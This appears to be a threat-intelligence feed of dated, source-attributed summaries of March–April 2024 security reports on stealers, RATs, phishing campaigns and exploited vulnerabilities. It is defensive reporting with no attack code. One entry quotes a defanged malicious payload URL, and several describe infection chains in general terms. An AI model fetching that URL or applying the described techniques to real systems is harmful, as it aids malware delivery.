- Pikabot, a malicious backdoor, has exhibited a significant evolution in its campaign tactics, distribution methods, and infection vectors since early 2023. McAfee Labs’ recent analysis reveals distinctive campaign variations employed by Pikabot, including HTML, JavaScript, SMB share, Excel, and JAR campaigns. Each campaign utilizes unique infection chains, such as utilizing meta tag refreshes in HTML, leveraging JavaScript to execute curl.exe, exploiting the MonikerLink bug via SMB shares, embedding SMB share links in Excel files, and dropping payloads through JAR files.
—
- Intel Source:
- SOC Radar
- Intel Name:
- The_Anatomy_of_Stealers
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- This article provides a comprehensive overview of stealer malware and its impact on cybersecurity. It emphasizes the need for continuous research into the operational mechanisms and tactics used by cybercriminals, and highlights the importance of threat intelligence and the MITRE ATT&CK framework in understanding and defending against stealer malware. It discusses the characteristics and common techniques of these malicious programs, the need for continuous education and awareness, and the use of effective security tools and practices. The article introduces the five most common stealers and their distinguishing features, analyzes them with the MITRE ATT&CK framework, and provides a detailed analysis of the Amadey Stealer malware and its techniques, together with the 15 most common ASN owners among stealer malware’s IP connections. It also discusses the prevalence of HTTP connections in stealer malware and the need for caution before blocking that protocol. It concludes by emphasizing the importance of integrating threat intelligence and using advanced cybersecurity solutions to detect and prevent these evolving threats.
—
- Intel Source:
- Sucuri
- Intel Name:
- Magento_Ecommerce_Malware
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- The article discusses the threat of “Magento Shoplift” malware, which targets ecommerce websites using the WordPress and Magento CMS platforms. The malware is designed to steal payment information and has been found in different forms, including one disguised as a Google Analytics script. The author, a security analyst, provides steps for mitigating the risk of this malware, such as keeping CMS software and plugins updated and using strong passwords.
—
- Intel Source:
- Bi.Zone
- Intel Name:
- Cloud_Werewolf_attacks_government_officials_in_Russia_and_Belarus
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- A cyberthreat group, identified as Cloud Werewolf, is conducting phishing campaigns targeting government employees in Russia and Belarus. The adversaries employ crafted emails mimicking legitimate documents, such as medical vouchers and federal orders, to lure victims into downloading malicious payloads. These payloads are hosted on remote servers, and their distribution is limited, allowing the threat actors to evade cybersecurity defenses within the targeted organizations.
—
- Intel Source:
- linkedin(Perception Point)
- Intel Name:
- Venom_RAT_poses_a_threat_across_various_sectors
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- This article highlights how attackers are employing phishing emails to distribute Venom RAT, a variant of Quasar RAT, across a wide array of sectors including hotels, travel, trading, finance, manufacturing, industry, and government in countries like Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina. The threat actor TA558 is identified as the mastermind behind this extensive phishing campaign targeting Latin America.
Source:
https://www.linkedin.com/feed/update/urn:li:activity:7180255262807572480/
—
- Intel Source:
- Embeeresearch
- Intel Name:
- Additional_malicious_infrastructure_of_the_ACTINIUM_threat_group
- Date of Scan:
- 2024-04-02
- Impact:
- MEDIUM
- Summary:
- This report demonstrates the process of leveraging publicly available intelligence reports and passive DNS analysis tools to uncover additional malicious infrastructure associated with a specific threat actor, referred to as ACTINIUM. By analyzing patterns in domains, IP addresses, registration dates, and subdomain structures provided in an initial report by Microsoft, the analysis identifies 122 new domains exhibiting similar characteristics. The report serves as an educational guide on how analysts can expand on existing intelligence using accessible tooling and open-source data.
Source:
https://www.embeeresearch.io/uncovering-apt-infrastructure-with-passive-dns-pivoting/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agent_Tesla_targeting_US_and_Australia
- Date of Scan:
- 2024-04-02
- Impact:
- MEDIUM
- Summary:
- Check Point Research discovered a recent Agent Tesla malware campaign that targeted American and Australian organizations. The phishing campaigns mainly target organizational email credentials, which are used to access the entities and run further campaigns, with the subsequent goal of executing Agent Tesla malware samples. After further investigation, CPR tracked down the activity of two cyber-crime actors behind the Agent Tesla operations, Bignosa and Gods, with evidence that the two are connected to each other.
Source:
https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia/
—
- Intel Source:
- Intelcorgi
- Intel Name:
- Bellingcat_Malware_analysis
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- The analysis involves an email campaign targeting the journalist group Bellingcat, delivering a malicious zip file that ultimately deploys an HTTP reverse shell. The infection chain involves a malicious zip archive, a .lnk file masquerading as a PDF, and a PowerShell script executing a reverse shell that enables data exfiltration. The campaign is attributed to a Russia-nexus threat actor based on consistently targeting organizations critical of Russia.
Source:
https://intelcorgi.com/2024/03/24/bellingcat-malware-investigation/
—
- Intel Source:
- Trend Micro
- Intel Name:
- DLL_Hijacking_and_API_Unhooking_in_the_Face_of_UNAPIMON_Malware
- Date of Scan:
- 2024-04-02
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro found a recent cyberespionage attack attributed to Earth Freybug, a sophisticated threat group known for its espionage and financially motivated activities. The attack employs dynamic-link library (DLL) hijacking and application programming interface (API) unhooking techniques to evade detection, most notably through a newly discovered malware named UNAPIMON.
Source:
https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html
—
- Intel Source:
- Moonlock
- Intel Name:
- Masked_macOS_stealer_found
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers at Moonlock Lab examined an AppleScript and Bash payload hosted on a remote server and concluded that these suspicious pieces of software pose a significant risk to the security and privacy of unsuspecting users. The Moonlock blog details the threats posed by the AppleScript/Bash payload, the trojan’s modus operandi, and the potential consequences for macOS users.
Source:
https://moonlock.com/macos-stealer-apple-bash-payload
—
- Intel Source:
- Checkpoint
- Intel Name:
- Cyberattacks_in_Multiple_Countries_Using_the_Linux_Version_of_DinodasRAT
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point have been closely observing the actions of a threat actor with a Chinese connection that is targeting Southeast Asia, Africa, and South America through cyber espionage. This action closely corresponds with the findings that Trend Micro researchers made available to the public in their thorough examination of Earth Krahang, a threat actor. One noteworthy tool in this actor’s arsenal is a cross-platform backdoor called DinodasRAT, alias XDealer, which was previously seen in assaults carried out by the Chinese threat actor LuoYu.
—
- Intel Source:
- Jamf Threat Labs
- Intel Name:
- Hackers_target_macOS_users_with_malicious_ads_spreading_Stealer_Malware
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers from Jamf Threat Labs discovered that attackers are targeting individuals in the crypto industry, recognizing the potential for substantial profits. Those involved in this sector must remain highly vigilant, as public information often reveals their status as asset holders or their association with crypto-related companies, making them prime targets.
Source:
https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
—
- Intel Source:
- Malwation
- Intel Name:
- New_MuddyWater_Campaigns
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- The MuddyWater APT group has recently launched new attacks in Israel, Africa, and Turkiye using products developed in-house and taking over third-party tools. Phishing attacks use PDF attachments that deliver agents from services like Atera and ConnectWise. Once installed, the actors gain privileges to monitor and execute files. MuddyWater is expanding its tactics to reduce its digital footprint, likely increasing spear-phishing via compromised accounts. Technical analysis shows attack files tailored and named for their targets. Compromised business accounts are used to build the agents, making the lures more persuasive to victims. The remote access tools ensure persistence and provide capabilities like command execution and file operations. MuddyWater aligns its attacks with Iran’s interests, adding techniques and using legitimate tools for anonymity.
Source:
https://www.malwation.com/blog/new-muddywater-campaigns-after-operation-swords-of-iron
—
- Intel Source:
- TheDFIRreport
- Intel Name:
- IcedID_Malware_Leveraged_in_Multi_Stage_Attack
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- In a cyber intrusion that occurred between late February and late March 2023, threat actors exploited a phishing campaign using Microsoft OneNote files to deliver the IcedID malware. The attack evolved through multiple stages, starting with IcedID deployment and persistence establishment. Subsequently, the attackers leveraged Cobalt Strike and AnyDesk to target file and backup servers, followed by data exfiltration using FileZilla and deployment of Nokoyawa ransomware.
Source:
https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- ACR_Stealer_Promotion_on_a_Well_Known_Russian_Forum
- Date of Scan:
- 2024-04-01
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have discovered that an ACR stealer is being promoted on a well-known Russian forum. The threat actors’ OPSEC errors allowed researchers to track the compromised bots, which led to the samples. These were all gathered at roughly the same time in late December 2023 and have fewer than ten VT detections between them. The timeframe aligns with the threat actor’s story, which describes how they started out operating in secret before going public.
—
- Intel Source:
- ASEC
- Intel Name:
- Deceptive_Malware_Distribution_via_Google_Ads_Tracking
- Date of Scan:
- 2024-04-01
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has uncovered a sophisticated malware distribution campaign exploiting Google Ads tracking. The attackers disguise malicious software as installers for popular groupware like Notion and Slack, tricking users into downloading and executing malware onto their systems. Through a complex redirection sequence, users are led to a seemingly legitimate landing page, where malware payloads are injected into critical Windows files. This Rhadamanthys malware poses a significant threat as it operates stealthily within legitimate system processes, enabling data theft without user detection.
—
- Intel Source:
- Huntress
- Intel Name:
- Malicious_activity_on_endpoints_running_MSSQL_Server_or_MSSQL_Express
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- Huntress SOC analysts tracked new alerts showing malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations or as part of a larger application package installation. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system was initiated by alerts
Source:
https://www.huntress.com/blog/mssql-to-screenconnect
—
- Intel Source:
- Rapid7
- Intel Name:
- Technical_analysis_of_IDAT_Loader_to_download_BruteRatel
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- This month, in two recent investigations, Rapid7’s Managed Detection & Response team observed the IDAT loader being used again. Based on the recent tactics, techniques, and procedures tracked, Rapid7’s team confirmed the activity is associated with financially motivated threat groups.
Source:
https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/
—
- Intel Source:
- Netcraft
- Intel Name:
- Attacks_on_USPS_and_global_postal_services
- Date of Scan:
- 2024-03-29
- Impact:
- LOW
- Summary:
- ‘darcula’ [sic] is a new, sophisticated Chinese Phishing-as-a-Service (PhaaS) platform used on more than 20,000 phishing domains that provides cyber criminals with easy access to branded phishing campaigns targeting organizations in multiple countries.
Source:
https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/
—
- Intel Source:
- Adlumin
- Intel Name:
- Zero_Trust_Solution_Misconfiguration_Enables_Threat_Actors_to_Bypass_2FA
- Date of Scan:
- 2024-03-29
- Impact:
- LOW
- Summary:
- Adlumin researchers detected a breach where attackers evaded Duo, a widely-used zero-trust security tool, to illicitly access a company’s networks. Adlumin urges organizations to review user access policies for accuracy and evaluate the security implications of allowing select users to bypass 2FA.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Exploiting_FortiClient_EMS_Vulnerability_Actively
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Unit 42 have discovered ongoing exploitation of the recently disclosed FortiClient EMS vulnerability, CVE-2023-48788. This activity resulted in unauthorized installations of Meterpreter, ScreenConnect Client, and Atera Agent.
—
- Intel Source:
- Checkmarx
- Intel Name:
- PyPi_Suspends_Project_Creation_and_User_Registration_Amid_Security_Threat
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Checkmarx researchers uncovered a campaign leveraging numerous malicious packages, using typosquatting attacks against Python packages installed through the command line. The attackers aim to pilfer crypto wallets, browser data, and credentials, and employ persistence mechanisms to survive reboots.
Source:
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- JavaScript_to_AsyncRAT_Transition
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- SANS researchers have analyzed an intriguing piece of JavaScript that was obfuscated quite effectively. The file was named “_Rechnung_01941085434_PDF.js” (“Rechnung” is German for invoice). The first obfuscation method is simple yet effective, as it stops a lot of utilities from operating correctly on distributions such as REMnux.
Source:
https://isc.sans.edu/diary/From+JavaScript+to+AsyncRAT/30788
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malicious_Google_Ad_Leads_To_Matanbuchus_Infection_With_DanaBot
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have discovered that a Google advertisement leads users to a fake funds-claim website, which spreads Matanbuchus and DanaBot.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- AgentTesla_Expands_Its_Footprint_in_Italy
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Operators of AgentTesla have recently stepped up their malspam efforts in Italy, supporting the upward trend in PDF attachment usage that has been noted in recent months. These documents have links that, when clicked, cause files containing malicious JavaScript code to be downloaded.
—
- Intel Source:
- EclecticIQ
- Intel Name:
- Cyber_Espionage_Campaign_Targeting_Indian_Government_Entities_and_Energy_Sector
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a new espionage effort that uses a customized version of HackBrowserData, an open-source information stealer that can gather cookies, history, and browser login credentials, to target Indian government entities and the nation’s energy sector.
—
- Intel Source:
- Esentire
- Intel Name:
- Exploitation_of_Fortinet_Vulnerability_CVE_2023_48788
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- This month, eSentire has tracked a spike in the exploitation of CVE-2023-48788 (CVSS: 9.8). CVE-2023-48788 is a SQL injection flaw in FortiClientEMS software. Exploitation would allow an unauthenticated remote threat actor to execute code or commands through specially crafted requests, enabling initial organizational access.
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- A_New_Info_Stealer_Named_Sync_Scheduler
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Cyfirma researchers have found Sync-Scheduler, an information-stealing malware that targets documents in particular and has anti-analysis built in. The research details the procedures used to create malware payloads and investigates the evasion strategies used by threat actors to avoid detection through in-depth examination.
—
- Intel Source:
- Cyble
- Intel Name:
- After_FBI_Seizure_WarzoneRAT_Returns_With_Multi_Stage_Attack
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble have noticed a campaign with a tax theme that may have spread via spam emails. Investigations revealed that the campaign disseminated the malware WarzoneRAT (Avemaria). The malware known as AveMaria is a Remote Administration Tool (RAT) that possesses the ability to take commands from a Command and Control (C&C) server and carry out a range of malevolent activities.
Source:
https://cyble.com/blog/warzonerat-returns-with-multi-stage-attack-post-fbi-seizure/
—
- Intel Source:
- Securelist
- Intel Name:
- DinodasRAT_Linux_backdoor
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target’s computer. A Windows version of this RAT was used in attacks against government entities in Guyana.
Source:
https://securelist.com/dinodasrat-linux-implant/112284/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Tax_Scam_Tsunami
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- The Check Point Research team has observed multiple instances of tax-related phishing scams and malware. The attacks aim to induce the end user to hand over either sensitive information or money.
—
- Intel Source:
- Cyble
- Intel Name:
- A_recent_leak_of_a_Solana_drainer_source_code
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer’s source code.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- An_interesting_piece_of_JavaScript
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Senior ISC Handler Xavier Mertens recently found an interesting piece of JavaScript payload and provided an analysis. This payload was downloaded from hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1. Once the page has been fetched, it will not work again and redirects the visitor to another site. Finally, another payload is delivered.
—
- Intel Source:
- Lumen
- Intel Name:
- The_Shadowy_Side_Of_TheMoon_Malware
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Lumen have discovered a multi-year campaign targeting Internet of Things (IoT) devices and routers that are nearing end of life (EoL). This campaign is linked to an upgraded version of the malware known as “TheMoon.” Since its inception in 2014, TheMoon has been running in the background, amassing almost 40,000 bots from 88 countries in January and February of 2024. As researchers have observed, most of these bots serve as the backbone of Faceless, a well-known proxy service targeted at cybercriminals.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Enhance_Cyberespionage_Activities_Against_ASEAN_Nations_by_Two_Chinese_APT_Groups
- Date of Scan:
- 2024-03-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Unit 42 have discovered two Chinese advanced persistent threat (APT) groups that are involved in cyberespionage against members and organizations connected to the Association of Southeast Asian Nations (ASEAN). Stately Taurus, the first APT organization, is believed to have targeted entities in Myanmar, the Philippines, Japan, and Singapore with two malware packages. An ASEAN-affiliated entity was infiltrated by the second Chinese APT outfit. In recent months, this APT group has attacked a number of government institutions in Southeast Asia, including those in Singapore, Laos, and Cambodia.
Source:
https://unit42.paloaltonetworks.com/chinese-apts-target-asean-entities/
—
- Intel Source:
- SOC Radar
- Intel Name:
- A_Robust_Cyberthreat_to_Brazil_Monetary_Security_CHAVECLOAK
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- CHAVECLOAK is a banking trojan that has become a serious threat to the Brazilian financial system. This sophisticated malware is made to get past security measures and steal confidential financial data from unsuspecting users.
Source:
https://socradar.io/chavecloak-cyber-threat-to-brazils-financial-security/
—
- Intel Source:
- Rewterz
- Intel Name:
- FormBook_Malware
- Date of Scan:
- 2024-03-27
- Impact:
- MEDIUM
- Summary:
- FormBook, an information stealer (infostealer) malware discovered in 2016, has various capabilities such as tracking keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook’s flexibility allows customization for specific targets and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments like PDFs and Office Documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook’s successor, XLoader, is currently active.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98
—
- Intel Source:
- Oligo Security
- Intel Name:
- Cyberattacks_Risk_Thousands_of_Businesses_Using_Ray_Framework
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Oligo have recently uncovered an ongoing campaign of attacks aimed at a flaw in the popular open-source AI framework Ray. There is no patch for a significant vulnerability that exposes thousands of businesses and servers using AI infrastructure to attack. Due to this flaw, hackers can commandeer the processing power of the organizations and reveal confidential information. For the past seven months, this vulnerability has been actively exploited, impacting a variety of industries including biopharma, education, and cryptocurrencies.
Source:
https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
—
- Intel Source:
- Morphisec
- Intel Name:
- Increase_in_activity_linked_to_Mispadu_banking_trojan
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Morphisec Labs identified a significant increase in activity linked to Mispadu, a banking trojan first flagged in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign.
Source:
https://blog.morphisec.com/mispadu-infiltration-beyond-latam
—
- Intel Source:
- Cybereason
- Intel Name:
- The_Effects_of_the_Anydesk_Breach
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Cybereason have looked at cases of AnyDesk code signing certificates being misused. On February 2, 2024, AnyDesk, a prominent global supplier of Remote Management and Monitoring (RMM) software, publicly announced that it had discovered a compromise involving production systems. As a result, it started an incident response process and, as part of its remediation activities, issued fresh certificates and revoked all of its security-related ones.
Source:
https://www.cybereason.com/blog/threat-alert-the-anydesk-breach-aftermath
—
- Intel Source:
- SonicWall
- Intel Name:
- Introducing_The_Most_Recent_Version_of_WhiteSnake_Stealer
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at SonicWall have discovered a new WhiteSnake Stealer version that makes it possible to steal vital, private information from infected systems. The string decryption code has been eliminated in this updated version, which also makes the code easier to understand.
—
- Intel Source:
- Sekoia
- Intel Name:
- Phishing_Kit_With_New_MFA_Targeting_Gmail_And_Microsoft_365_Accounts
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Tycoon 2FA was first detected by Sekoia researchers in October 2023 while conducting standard threat hunting. However, it has been operational since August 2023, when the Saad Tycoon group made it available via private Telegram channels. The Sekoia team thoroughly examined the Tycoon 2FA PhaaS kit and shared some of their discoveries with the Twitter community. Since then, researchers have been keeping a close eye on the putative developer’s activity, campaigns using the kit, source code upgrades, and the infrastructure of Tycoon 2FA phishing URLs.
—
- Intel Source:
- ASEC
- Intel Name:
- Unraveling_the_Kimsuky_Groups_Malware_Attacks_on_South_Korea
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- The Kimsuky group’s latest cyber espionage efforts against South Korean targets involve sophisticated malware, including a dropper masquerading as an installer from a public institution and the Endoor and Nikidoor backdoors for system infiltration and data theft. These attacks leverage social engineering, misuse of legitimate certificates, and command-and-control servers to achieve stealth, persistence, and exfiltration. Highlighting the critical need for updated security defenses and awareness, this analysis underscores the ongoing threat posed by the Kimsuky group’s advanced tactics.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Custom_PowerShell_Script_Allows_Agenda_Ransomware_to_Spreadto_vCenters_and_ESXi
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Newer variants of the Agenda ransomware, particularly its Rust form, have been discovered by TrendMicro researchers. Based on their observations, the Agenda ransomware gang deploys the ransomware binary using Cobalt Strike and Remote Monitoring and Management (RMM) tools. The Agenda ransomware executable can spread using PsExec and SecureShell, and additionally uses vulnerable SYS drivers to get around security measures.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- An_Attempt_to_Phish_Outlook_Addresses_PAs
- Date of Scan:
- 2024-03-26
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-AgID have alerted authorities to an ongoing campaign targeting public administrations with the goal of obtaining login credentials for Microsoft Outlook email accounts. In an effort to get login passwords and other sensitive data, attackers posing as company HR or accounting departments are sending fraudulent emails that purport to offer salary adjustments or access to electronic payslips.
Source:
https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_Agent_Tesla
- Date of Scan:
- 2024-03-26
- Impact:
- MEDIUM
- Summary:
- SpiderLabs discovered a phishing email on March 8, 2024, with a Windows executable disguised as a fraudulent bank payment attached to the email. This activity initiated an infection chain culminating in the deployment of Agent Tesla. The Trustwave blog shared a deep analysis of a newly identified loader, showing the attack’s advanced tactics, techniques, and procedures (TTPs) used in both the loader and its command and control (C2) framework.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Phishing_Attack_Designed_to_Steal_Security_Information_And_Credentials
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Researchers from CERT-AGID have discovered a phishing page targeting users of the Revenue Agency’s Siatel v2.0 – PuntoFisico platform. It has been live online since the early afternoon of March 21, 2024. Once the victims have been tricked into entering their password and tax code as part of their access credentials, the attackers ask them to upload or complete a photo of the Security Matrix that corresponds to the given credentials. Access to Punto Fisico, the Report Register, and Punto Fisico User Management all depend on the latter.
—
- Intel Source:
- Resecurity
- Intel Name:
- Online_scams_during_Ramadan_and_Eid_Fitr
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- This month during the holiday of Ramadan, Resecurity researchers discovered a significant spike in fraud activities and scams, coinciding with a surge in retail and online transactions.
—
- Intel Source:
- Sonatype
- Intel Name:
- Attackers_next_target_ML_AI_models
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- Sonatype analysts discovered a couple of open-source ML/AI models shared by data scientists and security researchers that proved that malware can creep onto AI platforms. Other examples include malicious models that were already reported by the community members and have since been booted off the platform.
Source:
https://blog.sonatype.com/open-source-ml/ai-models-attackers-next-potential-target
—
- Intel Source:
- Checkmarx
- Intel Name:
- Attack_using_fake_Python_Infrastructure
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- This month the Checkmarx researchers discovered a campaign targeting the software supply chain, with proof of the successful exploitation of multiple victims. These include the Top.gg GitHub organization (a community of over 170k users) and several individual developers.
Source:
https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Go_loader_uses_Rhadamanthys_stealer
- Date of Scan:
- 2024-03-25
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers described in their post a malvertising campaign with a new loader. The program is written in the Go language and deploys a payload, the Rhadamanthys stealer. PuTTY is a popular SSH and Telnet client for Windows that IT admins have used for years. The threat actor bought an ad that pretended to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys
—
- Intel Source:
- Infoblox
- Intel Name:
- Cobalt_strike_DNS_early_detection
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- Infoblox presented their study demonstrating the value of detecting attempted DNS exfiltration and Command and Control (C2) communications. They focused their study on two anonymized customers: a large e-commerce/retail company (Customer #1) and an educational institution (Customer #2).
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-cobalt-strike-dns-c2/
—
- Intel Source:
- Mandiant
- Intel Name:
- German_political_parties_attacked_by_APT29_with_WINELOADER
- Date of Scan:
- 2024-03-25
- Impact:
- MEDIUM
- Summary:
- In late February 2024, Mandiant identified APT29 — a Russian Federation-backed threat group linked by multiple governments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties.
Source:
https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties
—
- Intel Source:
- Any.Run
- Intel Name:
- Reverse_Engineering_Snake_Keylogger_analysis
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- An Any.Run researcher provided her sandbox analysis to understand the malware’s behavior. The insights from sandbox analysis provide a foundational understanding for reverse engineering Snake Keylogger, of what to anticipate and which specific aspects to investigate during the reverse engineering process.
Source:
https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Massive_StrelaStealer_Initiative_in_First_Half_of_2024
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have discovered a wave of extensive StrelaStealer campaigns affecting more than 100 organizations in the US and the EU. These campaigns take the form of spam emails with attachments that ultimately launch the StrelaStealer DLL payload.
Source:
https://unit42.paloaltonetworks.com/strelastealer-campaign/#post-133130-_vl741f7mzldf
—
- Intel Source:
- Sentilone
- Intel Name:
- AcidPour_new_embedded_wiper_variant_of_AcidRain
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- The article discusses the discovery of a new variant of the malware AcidRain, called AcidPour, which has been causing disruptions in Ukraine and Europe during the Russian invasion. It provides an overview of the AcidPour variant, including technical details such as its MD5, SHA1 and SHA256 hashes, size, and file type. It also highlights the similarities between AcidRain and AcidPour, as well as the added functionality in AcidPour for handling Unsorted Block Image (UBI) and Device Mapper (DM) logic. The article also notes the coding style of AcidPour, its self-delete function, and its alternate device wiping mechanism.
Source:
https://www.sentinelone.com/labs/acidpour-new-embedded-wiper-variant-of-acidrain-appears-in-ukraine/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Technical_Analysis_of_FalseFont_Backdoor
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- The article provides a detailed analysis of the FalseFont backdoor, a new malware developed by the Curious Serpens threat actor. The backdoor targets the aerospace and defense industries by masquerading as legitimate human resources software. The article discusses the backdoor’s architecture, functionality, and communication with threat actors, as well as ways to detect and prevent it. It also includes indicators of compromise and recommendations for improving security practices. The article also delves into the methods used by attackers to interact with the backdoor, including predefined commands and real-time communication through SignalR. It also describes the process of sending recurring requests to the backdoor’s command and control server.
Source:
https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA450_Uses_Embedded_Links_in_PDF_Attachments
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- The report discusses a recent phishing campaign by the threat actor TA450 targeting Israeli employees at large multinational organizations. The campaign used a pay-related social engineering lure and PDF attachments containing malicious links to file-sharing sites, a change in tactics for an actor that typically places malicious links directly in email bodies. The sender email account matched the lure content, and the campaign continued TA450’s pattern of targeting Israeli individuals with Hebrew-language lures sent from compromised .IL accounts. The report provides Emerging Threats (ET) signatures and indicators of compromise that organizations can use to protect against this threat.
—
- Intel Source:
- Talos
- Intel Name:
- New_Details_on_TinyTurla_Post_Compromise_Activity
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- The article discusses the ongoing campaign by the Russian espionage group Turla, specifically its use of the TinyTurla-NG implant, and reveals new information on the tactics, techniques and procedures (TTPs) the group uses to steal valuable information and spread through infected networks. The analysis, conducted in collaboration with CERT.NGO, shows that Turla infected multiple systems in a European NGO’s network. Post-compromise, the attackers established persistence, added exclusions to anti-virus products, and used a custom-built Chisel beacon from an open-source offensive framework. The article provides a visual representation of the infection chain, guidance for customers on detecting and blocking this threat, and a list of associated hashes, domains and IP addresses.
Source:
https://blog.talosintelligence.com/tinyturla-full-kill-chain/
—
- Intel Source:
- Talos
- Intel Name:
- Pig_butchering_scams
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
